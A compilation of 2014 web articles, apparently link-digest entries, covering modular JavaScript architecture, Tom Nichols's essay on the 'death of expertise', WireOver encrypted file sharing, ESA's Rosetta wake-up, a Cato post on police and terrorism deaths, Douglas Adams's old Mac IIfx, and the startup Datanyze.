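            // currently backed by jQuery; swapping libraries later means
            // changing this one line (eg. return dojo.query(selector, context);)
            return $(selector, context);
        },
        bind: function (element, event, fn) {
            $(element).bind(event, fn); // again, only this utility knows about jQuery
        }
    };
}());

// a module queries the DOM without hardcoding a particular library
var items = dom.query('.basket-item');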

Q: I'd like to start using this architecture today. Is there any boilerplate code around I can work from?

A: I plan on releasing a free boilerplate pack for this post when time permits, but at the moment, your best bet is probably the 'Writing Modular JavaScript' premium tutorial by Andrew Burgess (for complete disclosure, this is a referral link as any credits received are re-invested into reviewing material before I recommend it to others). Andrew's pack includes a screencast and code and covers most of the main concepts outlined in this post but opts for calling the facade a 'sandbox', as per Zakas. There's some discussion regarding just how DOM library abstraction should be ideally implemented in such an architecture - similar to my answer for the second question, Andrew opts for some interesting patterns on generalizing query selectors so that at most, switching libraries is a change that can be made in a few short lines. I'm not saying this is the right or best way to go about this, but it's an approach I personally also use.

Q: If the modules need to directly communicate with the core, is this possible?

A: As Zakas has previously hinted, there's technically no reason why modules shouldn't be able to access the core but this is more of a best practice than anything. If you want to strictly stick to this architecture you'll need to follow the rules defined or opt for a looser architecture as per the answer to the first question.

 

Credits

Thanks to Nicholas Zakas for his original work in bringing together many of the concepts presented today; Andrée Hansson for his kind offer to do a technical review of the post (as well as his feedback that helped improve it); Rebecca Murphey, Justin Meyer, John Hann, Peter Michaux, Paul Irish and Alex Sexton, all of whom have written material related to the topics discussed in the past and are a constant source of inspiration for both myself and others.

 

 

The Death Of Expertise


Comments:" The Death Of Expertise "

URL:http://thefederalist.com/2014/01/17/the-death-of-expertise


I am (or at least think I am) an expert. Not on everything, but in a particular area of human knowledge, specifically social science and public policy. When I say something on those subjects, I expect that my opinion holds more weight than that of most other people.

I never thought those were particularly controversial statements. As it turns out, they’re plenty controversial. Today, any assertion of expertise produces an explosion of anger from certain quarters of the American public, who immediately complain that such claims are nothing more than fallacious “appeals to authority,” sure signs of dreadful “elitism,” and an obvious effort to use credentials to stifle the dialogue required by a “real” democracy.

But democracy, as I wrote in an essay about C.S. Lewis and the Snowden affair, denotes a system of government, not an actual state of equality. It means that we enjoy equal rights versus the government, and in relation to each other. Having equal rights does not mean having equal talents, equal abilities, or equal knowledge.  It assuredly does not mean that “everyone’s opinion about anything is as good as anyone else’s.” And yet, this is now enshrined as the credo of a fair number of people despite being obvious nonsense.

What’s going on here?

I fear we are witnessing the “death of expertise”: a Google-fueled, Wikipedia-based, blog-sodden collapse of any division between professionals and laymen, students and teachers, knowers and wonderers – in other words, between those of any achievement in an area and those with none at all. By this, I do not mean the death of actual expertise, the knowledge of specific things that sets some people apart from others in various areas. There will always be doctors, lawyers, engineers, and other specialists in various fields. Rather, what I fear has died is any acknowledgement of expertise as anything that should alter our thoughts or change the way we live.

What has died is any acknowledgement of expertise as anything that should alter our thoughts or change the way we live.

This is a very bad thing. Yes, it’s true that experts can make mistakes, as disasters from thalidomide to the Challenger explosion tragically remind us. But mostly, experts have a pretty good batting average compared to laymen: doctors, whatever their errors, seem to do better with most illnesses than faith healers or your Aunt Ginny and her special chicken gut poultice. To reject the notion of expertise, and to replace it with a sanctimonious insistence that every person has a right to his or her own opinion, is silly.

Worse, it’s dangerous. The death of expertise is a rejection not only of knowledge, but of the ways in which we gain knowledge and learn about things. Fundamentally, it’s a rejection of science and rationality, which are the foundations of Western civilization itself. Yes, I said “Western civilization”: that paternalistic, racist, ethnocentric approach to knowledge that created the nuclear bomb, the Edsel, and New Coke, but which also keeps diabetics alive, lands mammoth airliners in the dark, and writes documents like the Charter of the United Nations.

This isn’t just about politics, which would be bad enough. No, it’s worse than that: the perverse effect of the death of expertise is that without real experts, everyone is an expert on everything. To take but one horrifying example, we live today in an advanced post-industrial country that is now fighting a resurgence of whooping cough — a scourge nearly eliminated a century ago — merely because otherwise intelligent people have been second-guessing their doctors and refusing to vaccinate their kids after reading stuff written by people who know exactly zip about medicine. (Yes, I mean people like Jenny McCarthy.

In politics, too, the problem has reached ridiculous proportions. People in political debates no longer distinguish the phrase “you’re wrong” from the phrase “you’re stupid.” To disagree is to insult. To correct another is to be a hater. And to refuse to acknowledge alternative views, no matter how fantastic or inane, is to be closed-minded.

How conversation became exhausting

Critics might dismiss all this by saying that everyone has a right to participate in the public sphere. That’s true. But every discussion must take place within limits and above a certain baseline of competence. And competence is sorely lacking in the public arena. People with strong views on going to war in other countries can barely find their own nation on a map; people who want to punish Congress for this or that law can’t name their own member of the House.

People with strong views on going to war in other countries can barely find their own nation on a map.

None of this ignorance stops people from arguing as though they are research scientists. Tackle a complex policy issue with a layman today, and you will get snippy and sophistic demands to show ever increasing amounts of “proof” or “evidence” for your case, even though the ordinary interlocutor in such debates isn’t really equipped to decide what constitutes “evidence” or to know it when it’s presented. The use of evidence is a specialized form of knowledge that takes a long time to learn, which is why articles and books are subjected to “peer review” and not to “everyone review,” but don’t tell that to someone hectoring you about how things really work in Moscow or Beijing or Washington.

This subverts any real hope of a conversation, because it is simply exhausting — at least speaking from my perspective as the policy expert in most of these discussions — to have to start from the very beginning of every argument and establish the merest baseline of knowledge, and then constantly to have to negotiate the rules of logical argument. (Most people I encounter, for example, have no idea what a non-sequitur is, or when they’re using one; nor do they understand the difference between generalizations and stereotypes.) Most people are already huffy and offended before ever encountering the substance of the issue at hand.
Once upon a time — way back in the Dark Ages before the 2000s — people seemed to understand, in a general way, the difference between experts and laymen. There was a clear demarcation in political food fights, as objections and dissent among experts came from their peers — that is, from people equipped with similar knowledge. The public, largely, were spectators.

This was both good and bad. While it strained out the kook factor in discussions (editors controlled their letters pages, which today would be called “moderating”), it also meant that sometimes public policy debate was too esoteric, conducted less for public enlightenment and more as just so much dueling jargon between experts.

If experts go back to only talking to each other, that’s bad for democracy.

No one — not me, anyway — wants to return to those days. I like the 21st century, and I like the democratization of knowledge and the wider circle of public participation. That greater participation, however, is endangered by the utterly illogical insistence that every opinion should have equal weight, because people like me, sooner or later, are forced to tune out people who insist that we’re all starting from intellectual scratch. (Spoiler: We’re not.) And if that happens, experts will go back to only talking to each other. And that’s bad for democracy.

The downside of no gatekeepers

How did this peevishness about expertise come about, and how can it have gotten so immensely foolish?

Some of it is purely due to the globalization of communication. There are no longer any gatekeepers: the journals and op-ed pages that were once strictly edited have been drowned under the weight of self-publishable blogs. There was once a time when participation in public debate, even in the pages of the local newspaper, required submission of a letter or an article, and that submission had to be written intelligently, pass editorial review, and stand with the author’s name attached. Even then, it was a big deal to get a letter in a major newspaper.

Now, anyone can bum rush the comments section of any major publication. Sometimes, that results in a free-for-all that spurs better thinking. Most of the time, however, it means that anyone can post anything they want, under any anonymous cover, and never have to defend their views or get called out for being wrong.

Another reason for the collapse of expertise lies not with the global commons but with the increasingly partisan nature of U.S. political campaigns. There was once a time when presidents would win elections and then scour universities and think-tanks for a brain trust; that’s how Henry Kissinger, Samuel Huntington, Zbigniew Brzezinski and others ended up in government service while moving between places like Harvard and Columbia.

This is the code of the samurai, not the intellectual, and it privileges the campaign loyalist over the expert.

Those days are gone. To be sure, some of the blame rests with the increasing irrelevance of overly narrow research in the social sciences. But it is also because the primary requisite of seniority in the policy world is too often an answer to the question: “What did you do during the campaign?” This is the code of the samurai, not the intellectual, and it privileges the campaign loyalist over the expert.

I have a hard time, for example, imagining that I would be called to Washington today in the way I was back in 1990, when the senior Senator from Pennsylvania asked a former U.S. Ambassador to the UN who she might recommend to advise him on foreign affairs, and she gave him my name. Despite the fact that I had no connection to Pennsylvania and had never worked on his campaigns, he called me at the campus where I was teaching, and later invited me to join his personal staff.

Universities, without doubt, have to own some of this mess. The idea of telling students that professors run the show and know better than they do strikes many students as something like uppity lip from the help, and so many profs don’t do it. (One of the greatest teachers I ever had, James Schall, wrote many years ago that “students have obligations to teachers,” including “trust, docility, effort, and thinking,” an assertion that would produce howls of outrage from the entitled generations roaming campuses today.) As a result, many academic departments are boutiques, in which the professors are expected to be something like intellectual valets. This produces nothing but a delusion of intellectual adequacy in children who should be instructed, not catered to.

The confidence of the dumb

There’s also that immutable problem known as “human nature.” It has a name now: it’s called the Dunning-Kruger effect, which says, in sum, that the dumber you are, the more confident you are that you’re not actually dumb. And when you get invested in being aggressively dumb…well, the last thing you want to encounter are experts who disagree with you, and so you dismiss them in order to maintain your unreasonably high opinion of yourself. (There’s a lot of that loose on social media, especially.)

All of these are symptoms of the same disease: a manic reinterpretation of “democracy” in which everyone must have their say, and no one must be “disrespected.” (The verb to disrespect is one of the most obnoxious and insidious innovations in our language in years, because it really means “to fail to pay me the impossibly high requirement of respect I demand.”) This yearning for respect and equality, even—perhaps especially—if unearned, is so intense that it brooks no disagreement. It represents the full flowering of a therapeutic culture where self-esteem, not achievement, is the ultimate human value, and it’s making us all dumber by the day.

Thus, at least some of the people who reject expertise are not really, as they often claim, showing their independence of thought. They are instead rejecting anything that might stir a gnawing insecurity that their own opinion might not be worth all that much.

Experts: the servants, not masters, of a democracy

So what can we do? Not much, sadly, since this is a cultural and generational issue that will take a long time to come right, if it ever does. Personally, I don’t think technocrats and intellectuals should rule the world: we had quite enough of that in the late 20th century, thank you, and it should be clear now that intellectualism makes for lousy policy without some sort of political common sense. Indeed, in an ideal world, experts are the servants, not the masters, of a democracy.

But when citizens forgo their basic obligation to learn enough to actually govern themselves, and instead remain stubbornly imprisoned by their fragile egos and caged by their own sense of entitlement, experts will end up running things by default. That’s a terrible outcome for everyone.

Expertise is necessary, and it’s not going away. Unless we return it to a healthy role in public policy, we’re going to have stupider and less productive arguments every day. So here, presented without modesty or political sensitivity, are some things to think about when engaging with experts in their area of specialization.

We can all stipulate: the expert isn’t always right. But an expert is far more likely to be right than you are. On a question of factual interpretation or evaluation, it shouldn’t engender insecurity or anxiety to think that an expert’s view is likely to be better-informed than yours. (Because, likely, it is.)

Experts come in many flavors. Education enables it, but practitioners in a field acquire expertise through experience; usually the combination of the two is the mark of a true expert in a field. But if you have neither education nor experience, you might want to consider exactly what it is you’re bringing to the argument.

In any discussion, you have a positive obligation to learn at least enough to make the conversation possible. The University of Google doesn’t count. Remember: having a strong opinion about something isn’t the same as knowing something.

And yes, your political opinions have value. Of course they do: you’re a member of a democracy and what you want is as important as what any other voter wants. As a layman, however, your political analysis has far less value, and probably isn’t — indeed, almost certainly isn’t — as good as you think it is.

And how do I know all this? Just who do I think I am?

Well, of course: I’m an expert.

Tom Nichols is a professor of national security affairs at the U.S. Naval War College and an adjunct at the Harvard Extension School. He claims expertise in a lot of things, but his most recent book is No Use: Nuclear Weapons and U.S. National Security (Penn, 2014). The views expressed are entirely his own.

Protect Yourself From The NSA With WireOver’s Encrypted File Sharing | TechCrunch


Comments:"Protect Yourself From The NSA With WireOver’s Encrypted File Sharing | TechCrunch"

URL:http://techcrunch.com/2014/01/17/wireover/


Nothing is truly NSA-proof or hacker-proof, but WireOver wants to offer you more security than Dropbox, Google Drive, or Skydrive. The Y Combinator startup just emerged from stealth with a desktop app that lets you send files of any size for free. And for $10 a month, your transfers get end-to-end encryption so only the recipient can open them. WireOver can’t even look at what you’re sending.

If you just want to send huge video files or photo collections to friends and aren’t worried about encryption, WireOver is totally free for unlimited file-size sharing. But its premium level of privacy could be a big draw for anyone with sensitive files to send.

WireOver founder Trent Ashburn tells me there are security holes in the way big file storage and sharing providers transfer your stuff. “In the industry it’s called encryption in transit and encryption at rest. But the files arrive on the servers decrypted. Their servers will re-encrypt them and store them, but the encryption keys used are controlled by and accessed by the provider.”

Ashburn tells me there’s a risk of the same company having both a copy of your encrypted files and the key to open them. But with WireOver’s end-to-end encryption, files are never stored on its servers, and it doesn’t have the decryption key. “The approach we’re going for is ‘Trust No One’”.
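To make the “Trust No One” idea concrete, here is a minimal conceptual sketch in Python using the PyNaCl library (an assumed dependency, and an illustration of end-to-end encryption in general, not WireOver’s actual implementation, which the company has not published). The sender encrypts with the recipient’s public key, so any relay in the middle only ever handles ciphertext:

from nacl.public import PrivateKey, SealedBox

# The recipient generates a keypair; the private half never leaves their machine.
recipient_key = PrivateKey.generate()
recipient_pub = recipient_key.public_key  # shared with the sender

# The sender encrypts with the recipient's public key before anything is transmitted.
ciphertext = SealedBox(recipient_pub).encrypt(b"contents of a large, sensitive file")

# A server that only forwards ciphertext cannot read it: it never holds the private key.
plaintext = SealedBox(recipient_key).decrypt(ciphertext)
assert plaintext == b"contents of a large, sensitive file"

The design point is the one Ashburn makes: the provider can route the bytes without ever being able to open them.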

WireOver Founder Trent Ashburn

Ashburn spent several years building computational models for quantitative hedge funds before becoming a semi-pro cyclist. He wanted to start a company he could relate to, and he found he was having some trouble with file transfers.

“With Dropbox, Google Drive, and Skydrive, sending small and medium-size files is pretty much solved but it’s a pain to send big files securely. There’s a bunch of things that Dropbox works great for [like syncing]. And they do their best within their goals to have security, but they’re not trying to be the most secure tool. They’re trying to be your files everywhere.”

So Ashburn entered WireOver into Y Combinator. They built a bunch of failed prototypes before settling on a Python-based desktop client. Along with the YC funding it got from Andreessen Horowitz, SV Angel, and Yuri Milner, the four-person startup has raised an additional seed round from Bessemer Venture Partners, Boston’s .406 Ventures, and angels like BrandCast’s Hayes Metzger.

How To Use WireOver

Once you’ve installed WireOver, you just dump files into its little window and type in the email address of the recipient[s]. Once they have WireOver installed and running, the file is transferred completely peer-to-peer, or routed through WireOver’s servers without being stored there.

If you have a Pro account and select a “Secure” transfer, your file gets end-to-end encryption, even if the recipient hasn’t bought a premium WireOver subscription. For even more security against man-in-the-middle attacks, you can request to verify the cryptographic fingerprint of the recipient’s machine.

The big downside to WireOver using a transfer system rather than cloud storage is that both the sender and recipient have to be online at the same time. You can’t just upload a file, email someone a link, and shut off your computer.

But since WireOver doesn’t store files, it doesn’t have to charge for unencrypted transfers. That means you could send 200-gigabyte or even terabyte-sized files for free, which could cost hundreds or thousands of dollars a year on Dropbox, Drive, or SkyDrive. If you’re looking for security and privacy, WireOver might be worth the $10 a month.

Ashburn says some clients have switched to WireOver from sending physical hard drives and USB drives through the mail or with FedEx. While there are other encrypted file sharing services, we haven’t found any popular ones that offer unlimited file sizes for free, or that encrypt those files as cheaply.

Companies large and small are seeing their data fall into the hands of hackers, and we’re realizing our governments are engaging in widespread surveillance. Meanwhile, as our cameras get better and our screens get bigger, file sizes just keep going up. So whether you’re paranoid or just want to send all your photos to mom, WireOver understands.

ESA’s ‘sleeping beauty’ wakes up from deep space hibernation / Rosetta / Space Science / Our Activities / ESA


Comments:"ESA’s ‘sleeping beauty’ wakes up from deep space hibernation / Rosetta / Space Science / Our Activities / ESA"

URL:http://www.esa.int/Our_Activities/Space_Science/Rosetta/ESA_s_sleeping_beauty_wakes_up_from_deep_space_hibernation


ESA’s ‘sleeping beauty’ wakes up from deep space hibernation

20 January 2014

It was a fairy-tale ending to a tense chapter in the story of the Rosetta space mission this evening as ESA heard from its distant spacecraft for the first time in 31 months.

Rosetta is chasing down Comet 67P/Churyumov-Gerasimenko, where it will become the first space mission to rendezvous with a comet, the first to attempt a landing on a comet’s surface, and the first to follow a comet as it swings around the Sun.

Since its launch in 2004, Rosetta has made three flybys of Earth and one of Mars to help it on course to its rendezvous with 67P/Churyumov-Gerasimenko, encountering asteroids Steins and Lutetia along the way.

Operating on solar energy alone, Rosetta was placed into a deep space slumber in June 2011 as it cruised out to a distance of nearly 800 million km from the warmth of the Sun, beyond the orbit of Jupiter.

Now, as Rosetta’s orbit has brought it back to within ‘only’ 673 million km from the Sun, there is enough solar energy to power the spacecraft fully again.

Thus today, still about 9 million km from the comet, Rosetta’s pre-programmed internal ‘alarm clock’ woke up the spacecraft. After warming up its key navigation instruments, coming out of a stabilising spin, and aiming its main radio antenna at Earth, Rosetta sent a signal to let mission operators know it had survived the most distant part of its journey.

The signal was received by both NASA’s Goldstone and Canberra ground stations at 18:18 GMT/ 19:18 CET, during the first window of opportunity the spacecraft had to communicate with Earth. It was immediately confirmed in ESA’s space operations centre in Darmstadt and the successful wake-up announced via the @ESA_Rosetta twitter account, which tweeted: “Hello, World!”

“We have our comet-chaser back,” says Alvaro Giménez, ESA’s Director of Science and Robotic Exploration. “With Rosetta, we will take comet exploration to a new level. This incredible mission continues our history of ‘firsts’ at comets, building on the technological and scientific achievements of our first deep space mission Giotto, which returned the first close-up images of a comet nucleus as it flew past Halley in 1986.”

How Rosetta wakes up from deep space hibernation

“This was one alarm clock not to hit snooze on, and after a tense day we are absolutely delighted to have our spacecraft awake and back online,” adds Fred Jansen, ESA’s Rosetta mission manager.

Comets are considered the primitive building blocks of the Solar System and likely helped to ‘seed’ Earth with water, perhaps even the ingredients for life. But many fundamental questions about these enigmatic objects remain, and through its comprehensive, in situ study of Comet 67P/Churyumov-Gerasimenko, Rosetta aims to unlock the secrets contained within.

“All other comet missions have been flybys, capturing fleeting moments in the life of these icy treasure chests,” says Matt Taylor, ESA’s Rosetta project scientist. “With Rosetta, we will track the evolution of a comet on a daily basis and for over a year, giving us a unique insight into a comet’s behaviour and ultimately helping us to decipher their role in the formation of the Solar System.”

But first, essential health checks on the spacecraft must be completed. Then the eleven instruments on the orbiter and ten on the lander will be turned on and prepared for studying Comet 67P/Churyumov-Gerasimenko.

“We have a busy few months ahead preparing the spacecraft and its instruments for the operational challenges demanded by a lengthy, close-up study of a comet that, until we get there, we know very little about,” says Andrea Accomazzo, ESA’s Rosetta operations manager.

Rosetta’s first images of 67P/Churyumov-Gerasimenko are expected in May, when the spacecraft is still 2 million km from its target. Towards the end of May, the spacecraft will execute a major manoeuvre to line up for its critical rendezvous with the comet in August.

After rendezvous, Rosetta will start with two months of extensive mapping of the comet’s surface, and will also make important measurements of the comet’s gravity, mass and shape, and assess its gaseous, dust-laden atmosphere, or coma. The orbiter will also probe the plasma environment and analyse how it interacts with the Sun’s outer atmosphere, the solar wind.

Using these data, scientists will choose a landing site for the mission’s 100 kg Philae probe. The landing is currently scheduled for 11 November and will be the first time that a landing on a comet has ever been attempted.

In fact, given the almost negligible gravity of the comet’s 4 km-wide nucleus, Philae will have to use ice screws and harpoons to stop it from rebounding back into space after touchdown.

Among its wide range of scientific measurements, Philae will send back a panorama of its surroundings, as well as very high-resolution pictures of the surface. It will also perform an on-the-spot analysis of the composition of the ices and organic material, including drilling down to 23 cm below the surface and feeding samples to Philae’s on-board laboratory for analysis.

The focus of the mission will then move to the ‘escort’ phase, during which Rosetta will stay alongside the comet as it moves closer to the Sun, monitoring the ever-changing conditions on the surface as the comet warms up and its ices sublimate.

The comet will reach its closest distance to the Sun on 13 August 2015 at about 185 million km, roughly between the orbits of Earth and Mars. Rosetta will follow the comet throughout the remainder of 2015, as it heads away from the Sun and activity begins to subside.

“We will face many challenges this year as we explore the unknown territory of comet 67P/Churyumov-Gerasimenko and I’m sure there will be plenty of surprises, but today we are just extremely happy to be back on speaking terms with our spacecraft,” adds Matt Taylor.


1964-2014: 50 years serving European Cooperation and Innovation

In 1964, the Conventions of the European Launcher Development Organisation (ELDO) and the European Space Research Organisation (ESRO) entered into force. A little more than a decade later, the European Space Agency (ESA) was established, taking over from these two organisations.

2014 will be dedicated to addressing the future in the light of these 50 years of unique achievements in space, which have put ESA among the leading space agencies in the world.

The motto 'serving European cooperation and innovation' underlines how much ESA, together with the national delegations from its 20 Member States, space industry and the scientific community, has made a difference.

Fifty years of European cooperation in space is an anniversary for the whole space sector in Europe, which can be proud of its results and achievements. But it is more than that: it is a testimony that the idea of Europe, European identity and progress has been served by ESA, and that continues to be its mission for the future.

About the European Space Agency

The European Space Agency (ESA) is Europe's gateway to space.

ESA is an intergovernmental organisation, created in 1975, with the mission to shape the development of Europe's space capability and ensure that investment in space delivers benefits to the citizens of Europe and the world.

ESA has 20 Member States: Austria, Belgium, the Czech Republic, Denmark, Finland, France, Germany, Greece, Ireland, Italy, Luxembourg, the Netherlands, Norway, Poland, Portugal, Romania, Spain, Sweden, Switzerland and the United Kingdom, of whom 18 are Member States of the EU.

ESA has Cooperation Agreements with eight other Member States of the EU. Canada takes part in some ESA programmes under a Cooperation Agreement.

ESA is also working actively with the EU, for the implementation of the programmes Galileo and Copernicus.

By coordinating the financial and intellectual resources of its members, ESA can undertake programmes and activities far beyond the scope of any single European country.

ESA develops the launchers, spacecraft and ground facilities needed to keep Europe at the forefront of global space activities.

Today, it launches satellites for Earth observation, navigation, telecommunications and astronomy, sends probes to the far reaches of the Solar System and cooperates in the human exploration of space.

Learn more at www.esa.int

For further information:
ESA Media Relations Office
Email: media@esa.int
Tel: +33 1 53 69 72 99


You're Eight Times More Likely to be Killed by a Police Officer than a Terrorist | Cato @ Liberty


Comments:"You’re Eight Times More Likely to be Killed by a Police Officer than a Terrorist"

URL:http://www.cato.org/blog/youre-eight-times-more-likely-be-killed-police-officer-terrorist


It got a lot of attention this morning when I tweeted, “You’re Eight Times More Likely to be Killed by a Police Officer than a Terrorist.” It’s been quickly retweeted dozens of times, indicating that the idea is interesting to many people. So let’s discuss it in more than 140 characters.

In case it needs saying: Police officers are unlike terrorists in almost all respects. Crucially, the goal of the former, in the vast majority of cases, is to have a stable, peaceful, safe, law-abiding society, which is a goal we all share. The goal of the latter is … well, it’s complicated. I’ve cited my favorite expert on that, Audrey Kurth Cronin, here and here and here. Needless to say, the goal of terrorists is not that peaceful, safe, stable society.

I picked up the statistic from a blog post called: “Fear of Terror Makes People Stupid,” which in turn cites the National Safety Council for this and lots of other numbers reflecting likelihoods of dying from various causes. So dispute the number(s) with them, if you care to.

I take it as a given that your mileage may vary. If you dwell in the suburbs or a rural area, and especially if you’re wealthy, white, and well-spoken, your likelihood of death from these two sources probably converges somewhat (at very close to zero).

The point of the quote is to focus people on sources of mortality society-wide, because this focus can guide public policy efforts at reducing death. (Thus, the number is not a product of the base rate fallacy.) In my opinion, too many people are still transfixed by terrorism despite the collapse of Al Qaeda over the last decade and the quite manageable—indeed, the quite well-managed—danger that terrorism presents our society today.

If you want to indulge your fears and prioritize terrorism, you’ll have plenty of help, and neither this blog post nor any other appeal to reason or statistics is likely to convince you. Among the John Mueller articles I would recommend, though, is “Witches, Communists, and Terrorists: Evaluating the Risks and Tallying the Costs” (with Mark Stewart).

If one wants to be clinical about what actually reduces deaths among Americans, one should ask why police officers are such a significant source of danger. I have some ideas.

Cato’s work on the War on Drugs shows how it produces danger to the public and law enforcement both, not to mention loss of privacy and civil liberties, disrespect for law enforcement, disregard of the rule of law, and so on. Is the sum total of mortality and morbidity reduced or increased by the War on Drugs? I can’t say. But the War on Drugs certainly increases the danger to innocent people (including law enforcement personnel), where drug legalization would allow harm to naturally concentrate on the people who choose unwisely to use drugs.

The militarization of law enforcement probably contributes to the danger. Cato’s Botched Paramilitary Police Raids map illustrates the problem of over-aggressive policing. Cato alum Radley Balko now documents these issues at the Huffington Post. Try out his “Cop or Soldier?” quiz.

There are some bad apples in the police officer barrel. Given the power that law enforcement personnel have—up to and including the power to kill—I’m not satisfied that standards of professionalism are up to snuff. You can follow the Cato Institute’s National Police Misconduct Reporting Project on Twitter at @NPMRP.

If the provocative statistic cited above got your attention, that’s good. If it adds a little more to your efforts at producing a safe, stable, peaceful, and free society, all the better.

Douglas Adams's Mac IIfx


Comments:"Douglas Adams's Mac IIfx"

URL:http://www.vintagemacworld.com/iifx.html


At the end of 2003, I was looking to buy a Mac IIfx for some hacking. I needed a Mac with six NuBus slots and the IIfx is the fastest model that fitted my requirements. One turned up on eBay and I was able to win the auction at a sensible price. The seller was a computer scrapper who had no knowledge or interest in the history of the system.

The system was purchased "untested, as is" and the photo accompanying the auction (see opposite) indicated that it wasn't going to be in pristine condition. When delivered the case was filthy and the steel RF shielding inside had surface rust indicating that it had been stored in a damp environment for a couple of years. The side of the case (psu end) had four grubby chunks of Blu Tac attached. Obviously a previous owner had decided to stand the IIfx on its side as a tower case and used the Blu Tac to stabilise it. (If you try this at home with a IIfx, please stand the case on the other end so that the psu ventilation slots aren't blocked.)

I stripped out the components, scraped off the majority of the Blu Tac and dumped the bare case in the bath tub with some detergent. As the photos show, some of the Blu Tac is still lodged around the ventilation slots and the underside of the case has a peculiar sunburn pattern. My IIfx still looks a mess but I only bought it for hacking anyway.

When switched on for the first time, it was clear that the last user had little understanding of how to store files on the hard disk. The root directory contained hundreds of MacWrite documents. Scrolling through them was a pain and, as I have no interest in other people's private affairs, I selected the lot and deleted them. That was mistake number one. I left the applications folder intact to have a look at later.

In its day, the IIfx was Apple's flagship computer and a well specified machine would have left little change from £10,000. My new purchase had 20MB RAM, an A4 portrait display card, a 256 colour Toby video card and a very noisy Fujitsu (non-Apple ROM) hard disk drive running System software 7.5.5. All of the blanking plates for the NuBus slots had been removed and it is likely that any useful cards had been removed as the Mac descended the scrap chain; the Open Transport preferences contained a reference to an ethernet adapter and the control panel for a Radius display card was installed.

The applications software installed on the system didn't look very interesting. All of the files I had deleted were MacWrite documents and it appeared that the IIfx had been used as a glorified word processor. However Retrospect Remote was installed for backups so somebody had been using the Mac for serious work previously. The last backup was performed on 02-02-1997 but, according to the last modified file dates, the system remained in use until March 1999. Some power user utilities from CE and More were also installed.

I started up MacWrite Pro and noticed that it was registered to "Douglas Adams, Serious Productions Ltd". I paid little attention to this as I had seen warez copies of Claris software where the registered user was Douglas Adams. I then started Claris Resolve, ignoring a warning dialog (mistake number two), and noted that this software was also registered to Douglas Adams. The copies of Claris Works 4.0 and Now Up-to-Date were registered to Jane Belson; I was unfamiliar with the name but a quick web search determined that she is Douglas Adams's widow.

Deleting all those files suddenly seemed like a dumb thing to have done... To undo mistake number one, I popped an ethernet card in the IIfx, mounted an AppleShare volume and ran Norton Utilities to recover the files onto the server.

The results? I recovered hundreds of documents relating to Jane Belson's professional work and precisely two that bear the hand of Douglas Adams. I doubt whether the copyright lawyers would chase me for publishing his Idiots Guide to using a Mac but you wouldn't be thanking me either. For now at least, the draft of a TV sketch called Brief Re-encounter is strictly for my personal enjoyment.

And mistake number two? I should have paid attention to the dialog box when I'd started up Claris Resolve. In twenty years of Mac use working on literally thousands of systems, I've only seen viruses half a dozen times so I ignored the warning. How wrong can you get... A precautionary scan a few hours later using the old Disinfectant application showed that Claris Resolve had been infected by the MBDF A virus and that every application that I had subsequently run was infected too. Cheers, Douglas!

Jane Belson contacted me earlier this year, telling me that she recognised the IIfx as the one that sat next to her desk and to that of Douglas. A copy of the sketch Brief Re-encounter was sent to her.

Leander Kahney reported on the IIfx in his Cult of Mac weblog at Wired magazine in March 2004 (Article).

Copyright information: If you wish to use any images on these pages, please contact the author, Phil Beesley on beesley@mandrake.demon.co.uk.


This startup tells you when companies try your competitors' software -- and it's growing 25% a month | VentureBeat | Big Data | by John Koetsier


Comments:"This startup tells you when companies try your competitors' software -- and it's growing 25% a month | VentureBeat | Big Data | by John Koetsier"

URL:http://venturebeat.com/2014/01/20/this-startup-tells-you-when-companies-try-your-competitors-software-and-is-growing-25-a-month/


A tiny San Mateo startup that has taken no angel money, no venture capital, and no outside funding of any kind is growing at the torrid rate of 25 percent per month and luring away key employees from hot growing companies like KISSmetrics.

How? By offering you data you can’t get anywhere else.


Datanyze founder and CEO Ilya Semin

“I validated this via my team,” Datanyze cofounder Ben Sardella, who was recently running sales and customer success at KISSmetrics, told me today. “We started using Datanyze, and within two and a half months closed the largest deal in KISSmetrics’ history.”

Datanyze is like Google for sales and marketing.

Every day, the company crawls millions of websites with its custom spider technology, searching for hints about what software each company is using. In the era of cloud computing, few things are private, and anything on your website related to that marketing automation system you’re using or that CRM you’ve adopted or that e-commerce engine you installed reveals traces of what systems you’ve bought and what solutions you’re using. Bits of code, fragments of Javascript, embeds, even CSS markup could be the clue.
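The core of that kind of detection is simple enough to sketch. The following is a minimal, hypothetical Python crawler, not Datanyze’s actual system; the fingerprint table is purely illustrative, and a real crawler would rely on far richer signatures:

import urllib.request

# Illustrative fingerprints only: a markup trace mapped to the product it suggests.
FINGERPRINTS = {
    "googletagmanager.com/gtm.js": "Google Tag Manager",
    "cdn.optimizely.com": "Optimizely",
    "js.hs-scripts.com": "HubSpot",
}

def detect_technologies(url):
    """Fetch one page and return the products whose traces appear in its HTML."""
    html = urllib.request.urlopen(url, timeout=10).read().decode("utf-8", "replace")
    return sorted(product for trace, product in FINGERPRINTS.items() if trace in html)

print(detect_technologies("https://example.com"))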

That’s powerful, and it’s similar to what Datanyze competitors HG Data and Salesify do right now. What Datanyze is particularly excited about, however, is that its data is updated every single day.

And that can give sales reps seeming superpowers.


“Because we do this on a daily basis, we can see when people start a software trial,” CEO Ilya Semin told me. “So we can tell their competitors, and they can call those companies, and the sales rep can say: ‘I see you’re checking out our competitor’s solution right now … why don’t you try ours as well?’”

That’s pure marketing magic.
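A hedged sketch of how that daily cadence could surface trial starts (again illustrative Python rather than Datanyze’s pipeline, with hypothetical inputs): keep yesterday’s scan results per domain, diff them against today’s, and alert on anything that just appeared.

def new_adoptions(yesterday, today):
    """Return products detected today that were absent yesterday, keyed by domain.

    Both arguments map a domain to the set of products detected there;
    the inputs in the example below are hypothetical.
    """
    alerts = {}
    for domain, products in today.items():
        added = products - yesterday.get(domain, set())
        if added:
            alerts[domain] = added
    return alerts

print(new_adoptions(
    {"example.com": {"Optimizely"}},
    {"example.com": {"Optimizely", "HubSpot"}},
))  # -> {'example.com': {'HubSpot'}}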


Datanyze data offers a unique insight into market share — in this case e-commerce engines.

Not only is the prospect clearly interested in the type of solution you’re offering, he or she is right in the buying cycle as well. And, since you know what solution they are currently testing and presumably have already built a comprehensive sales strategy against that competitor, it’s a fairly simple thing to make the case that, in the interests of covering all their bases, the prospect should give you a shot too. Instantly, you’re in the door.

“That’s our major differentiator,” Semin says.

Updating data every single day is unheard of in the traditional business data world, where data is often old and frequently outdated. Sardella told me about a $10,000 Data.com purchase that KISSmetrics made recently that turned out to be 80 percent inaccurate — causing the company to ask for a refund.

“Buying data is like driving a new car off the lot,” Sardella said. “The value drops 30 percent right away.”

